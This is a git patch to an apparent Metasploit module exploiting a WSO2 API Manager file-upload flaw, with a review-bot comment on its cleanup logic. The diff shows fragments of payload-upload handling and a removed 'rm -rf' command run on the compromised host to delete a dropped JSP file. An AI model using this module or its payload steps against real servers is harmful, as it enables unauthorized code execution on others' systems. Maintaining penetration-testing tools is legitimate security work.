From 41e7bf8812cd3c4137dc3fcd2cea9636ef9c6f92 Mon Sep 17 00:00:00 2001
From: Heyder Andrade
Date: Wed, 11 Dec 2024 11:58:53 +0100
Subject: [PATCH] Enhance: Rollback to register_file_for_cleanup

- Verified that the CWD is the WSO2_SERVER_HOME, allowing the uploaded payload file to be registered for cleanup using register_file_for_cleanup.
- Improved feedback by including the payload filename in the success message.
- Removed redundant on_new_session cleanup logic, as file management is now handled by FileDropper.
---
 .../multi/http/wso2_api_manager_file_upload_rce.rb | 11 ++++-------
 1 file changed, 4 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb b/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
index 9eab0e9574db..f644240df58f 100644
--- a/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
+++ b/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
+ include Msf::Exploit::FileDropper
 include Msf::Exploit::Remote::HttpClient
 prepend Msf::Exploit::Remote::AutoCheck
@@ -357,7 +358,9 @@ def upload_payload(api_id, doc_id)
 )
 fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed') unless res&.code == 201
- print_good('Payload uploaded successfully')
+ register_file_for_cleanup("repository/deployment/server/webapps/authenticationendpoint/#{jsp_filename}")
+
+ print_good("Payload uploaded successfully. File: #{jsp_filename}")
 return res
 end
@@ -393,12 +396,6 @@ def exploit
 end
 end
- def on_new_session(session)
- super
- # Registering for cleanup doesn't work as the file is not placed in the CWD, and the WSO2_SERVER_HOME might vary
- session.shell_command_token("rm -rf $WSO2_SERVER_HOME/repository/deployment/server/webapps/authenticationendpoint/#{jsp_filename}")
- end
-
 def cleanup
 return unless session_created?
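Review bot: The `register_file_for_cleanup("repository/deployment/...")` call added in `upload_payload` uses a path relative to the session's working directory, and nothing in the code records that it only resolves when the server process runs with WSO2_SERVER_HOME as its CWD, the condition the removed `on_new_session` comment described as unreliable. The commit message says this was verified, but if a deployment starts the server from another directory (a service wrapper, for instance; not checked here), the delete would miss and the uploaded JSP would stay in the web-served `authenticationendpoint` directory of the system under test. I would put the assumption next to the call, e.g. `# Path is relative to the session CWD; this holds when the server runs from WSO2_SERVER_HOME. Otherwise remove the file by hand.`, and list the dropped file in the module documentation's cleanup notes. `upload_payload` starts above the hunk, so how `jsp_filename` is produced is not visible here.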